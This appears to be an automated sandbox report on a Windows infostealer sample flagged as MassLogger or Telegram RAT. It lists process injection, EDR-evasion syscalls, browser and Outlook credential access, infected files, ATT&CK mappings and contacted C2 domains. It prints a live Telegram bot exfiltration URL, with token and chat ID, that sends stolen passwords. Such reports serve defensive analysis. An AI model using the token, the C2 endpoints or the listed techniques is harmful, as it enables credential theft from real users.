Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_0089420B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		14_2_0089420B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtOpenKeyEx: Indirect: 0x140077B9B	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtQueryValueKey: Indirect: 0x140077C9F	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtClose: Indirect: 0x140077E81

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\SABXJ1B5c8.exe

Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\SABXJ1B5c8.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 702008

Jump to behavior

Source: C:\Users\user\Desktop\SABXJ1B5c8.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\SABXJ1B5c8.exe"

Jump to behavior

Source: SABXJ1B5c8.exe

Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning

Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TST8A25.tmp VolumeInformation	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TST8A36.tmp VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\perfhost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\System32\TieringEngineService.exe

Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias

Source: C:\Windows\SysWOW64\perfhost.exe

Code function: 14_2_00877960 GetVolumeInformationW,GetWindowsDirectoryW,CreateThread,CreateThread,GetLastError,GetWindowsDirectoryW,CreateThread,GetUserNameW,GetLastError,GetComputerNameW,CreateThread,GetVolumeInformationW,CreateThread,GetUserNameW,GetLastError,

14_2_00877960

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Yara detected MassLogger RAT

Source: Yara match	File source: 00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2836403260.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4068, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2836403260.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4068, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2836403260.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4068, type: MEMORYSTR

Remote Access Functionality

Yara detected MassLogger RAT

Source: Yara match	File source: 00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2836403260.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4068, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2836403260.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4068, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	2 LSASS Driver	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	1 Taint Shared Content	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	2 LSASS Driver	1 Deobfuscate/Decode Files or Information	11 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	212 Process Injection	4 Obfuscated Files or Information	NTDS	113 System Information Discovery	Distributed Component Object Model	11 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	211 Security Software Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	21 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	222 Masquerading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	212 Process Injection	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SABXJ1B5c8.exe	68%	Virustotal		Browse
SABXJ1B5c8.exe	84%	ReversingLabs	Win32.Virus.Expiro
SABXJ1B5c8.exe	100%	Avira	W32/Infector.Gen
SABXJ1B5c8.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Check.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Check.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Info.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://xml.org/sax/properties/lexical-handlerhttp://xml.org/sax/features/namespace-prefixeshttp://xm	0%	Avira URL Cloud	safe
http://54.244.188.177/t	100%	Avira URL Cloud	malware
http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzgxODYwMDA0	100%	Avira URL Cloud	malware
http://ww12.przvgke.biz/sbjeah?usid=27&utid=10450772717	100%	Avira URL Cloud	malware
http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzgxODVmZjVk	100%	Avira URL Cloud	malware
http://schemas.micrXX	0%	Avira URL Cloud	safe
http://54.244.188.177/xifbrctmnvq	100%	Avira URL Cloud	malware
http://54.244.188.177/	100%	Avira URL Cloud	malware
http://54.244.188.177/f	100%	Avira URL Cloud	malware
http://18.141.10.107/dawajiqtqrkbbpd	0%	Avira URL Cloud	safe
http://54.244.188.177/illjjcn	100%	Avira URL Cloud	malware
http://127.0.0.1:13556/HttpLogWriterEndpointInsiderSlabBehaviorInsiderSlabBehaviorReportedStateInsid	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
przvgke.biz	72.52.178.23	true	false	high
ssbzmoy.biz	18.141.10.107	true	false	high
knjghuig.biz	18.141.10.107	true	false	high
vjaxhpbji.biz	82.112.184.197	true	false	high
pywolwnvd.biz	54.244.188.177	true	false	high
reallyfreegeoip.org	104.21.64.1	true	false	high
checkip.dyndns.com	158.101.44.242	true	false	high
cvgrf.biz	54.244.188.177	true	false	high
lpuegx.biz	82.112.184.197	true	false	high
084725.parkingcrew.net	13.248.148.254	true	false	high
xlfhhhm.biz	47.129.31.212	true	false	high
npukfztj.biz	44.221.84.105	true	false	high
api.telegram.org	149.154.167.220	true	false	high
zlenh.biz	unknown	unknown	false	high
checkip.dyndns.org	unknown	unknown	false	high
uhxqin.biz	unknown	unknown	false	high
ww12.przvgke.biz	unknown	unknown	true	unknown
anpmnmxo.biz	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
http://vjaxhpbji.biz/rgnicitetktmnuug	false	high
http://lpuegx.biz/jnemakkqdmxs	false	high
http://przvgke.biz/sbjeah	false	high
http://lpuegx.biz/xuri	false	high
https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613755033&caption=user%20/%20Passwords%20/%208.46.123.189	false	high
http://checkip.dyndns.org/	false	high
http://ssbzmoy.biz/dawajiqtqrkbbpd	false	high
http://vjaxhpbji.biz/bcwwcxayhua	false	high
http://knjghuig.biz/ebncgq	false	high
http://pywolwnvd.biz/lfsgndokapxyhw	false	high
http://npukfztj.biz/brsjohajbqj	false	high
http://cvgrf.biz/kmpia	false	high
http://knjghuig.biz/wmfptllh	false	high
http://pywolwnvd.biz/uljtmx	false	high
http://przvgke.biz/yjxln	false	high
http://cvgrf.biz/xifbrctmnvq	false	high
http://pywolwnvd.biz/illjjcn	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.telegram.org	RegSvcs.exe, 00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	RegSvcs.exe, 00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613	RegSvcs.exe, 00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmp	false		high
https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881	armsvc.exe, 00000002.00000003.2476088254.00000000007B0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://xml.org/sax/properties/lexical-handlerhttp://xml.org/sax/features/namespace-prefixeshttp://xm	OcPubMgr.exe.2.dr	false	Avira URL Cloud: safe	unknown
http://ww12.przvgke.biz/sbjeah?usid=27&utid=10450772717	armsvc.exe, 00000002.00000003.2369732741.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://18.141.10.107/	armsvc.exe, 00000002.00000003.2059203379.0000000000937000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.1841325867.000000000092E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.1841325867.0000000000937000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2059203379.000000000092F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.openssl.org/support/faq.html	officesvcmgr.exe.2.dr	false		high
http://54.244.188.177/t	armsvc.exe, 00000002.00000003.2059203379.0000000000937000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://54.244.188.177/xifbrctmnvq	armsvc.exe, 00000002.00000003.2059203379.0000000000937000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith	msedge_proxy.exe.2.dr	false		high
http://checkip.dyndns.org/q	RegSvcs.exe, 00000011.00000002.2836403260.0000000000402000.00000040.80000000.00040000.00000000.sdmp	false		high
http://reallyfreegeoip.org	RegSvcs.exe, 00000011.00000002.2869998704.00000000026A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	RegSvcs.exe, 00000011.00000002.2869998704.0000000002680000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.micrXX	AppVClient.exe, 00000007.00000002.1596296692.0000000000554000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.1595419974.000000000053C000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.1595705403.0000000000544000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.1595229479.0000000000535000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.openssl.org/support/faq.htmlerror	officesvcmgr.exe.2.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000011.00000002.2869998704.0000000002601000.00000004.00000800.00020000.00000000.sdmp	false		high
https://clients.config.office.net/manage/v1.0/serviceabilitymanager/MsaDeviceTokenMsaLastUpdatedMsaE	officesvcmgr.exe.2.dr	false		high
http://54.244.188.177/	armsvc.exe, 00000002.00000003.2059203379.0000000000937000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.1817901404.0000000000937000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzgxODVmZjVk	armsvc.exe, armsvc.exe, 00000002.00000003.2117513572.0000000000969000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2117900022.0000000002340000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://reallyfreegeoip.org/xml/	RegSvcs.exe, 00000011.00000002.2869998704.0000000002680000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2836403260.0000000000402000.00000040.80000000.00040000.00000000.sdmp	false		high
https://crash-reports.mozilla.com/submit?id=	armsvc.exe, 00000002.00000003.2476007253.00000000007B0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1	armsvc.exe, 00000002.00000003.2476088254.00000000007B0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://54.244.188.177/f	armsvc.exe, 00000002.00000003.2059203379.0000000000937000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://checkip.dyndns.org	RegSvcs.exe, 00000011.00000002.2869998704.0000000002674000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2869998704.0000000002680000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pcnatrk.net/track.	armsvc.exe, 00000002.00000003.2117900022.0000000002340000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2123658991.0000000002330000.00000004.00000020.00020000.00000000.sdmp	false		high
http://18.141.10.107/dawajiqtqrkbbpd	armsvc.exe, 00000002.00000003.1841325867.0000000000937000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.1841325867.0000000000947000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzgxODYwMDA0	armsvc.exe, 00000002.00000003.2123658991.0000000002330000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://reallyfreegeoip.org	RegSvcs.exe, 00000011.00000002.2869998704.0000000002680000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.winimage.com/zLibDll	armsvc.exe, 00000002.00000003.1934226332.0000000002000000.00000004.00001000.00020000.00000000.sdmp	false		high
http://54.244.188.177/illjjcn	armsvc.exe, 00000002.00000003.1817901404.0000000000947000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://api.telegram.org	RegSvcs.exe, 00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmp	false		high
http://127.0.0.1:13556/HttpLogWriterEndpointInsiderSlabBehaviorInsiderSlabBehaviorReportedStateInsid	officesvcmgr.exe.2.dr	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot-/sendDocument?chat_id=	RegSvcs.exe, 00000011.00000002.2836403260.0000000000402000.00000040.80000000.00040000.00000000.sdmp	false		high
https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff	msedge_proxy.exe.2.dr	false		high
https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=przvgke.biz	armsvc.exe, 00000002.00000003.2116959373.0000000002010000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2117900022.0000000002340000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2122593748.0000000001FD0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2123658991.0000000002330000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
72.52.178.23	przvgke.biz	United States	32244	LIQUIDWEBUS	false
13.248.148.254	084725.parkingcrew.net	United States	16509	AMAZON-02US	false
44.221.84.105	npukfztj.biz	United States	14618	AMAZON-AESUS	false
54.244.188.177	pywolwnvd.biz	United States	16509	AMAZON-02US	false
104.21.64.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
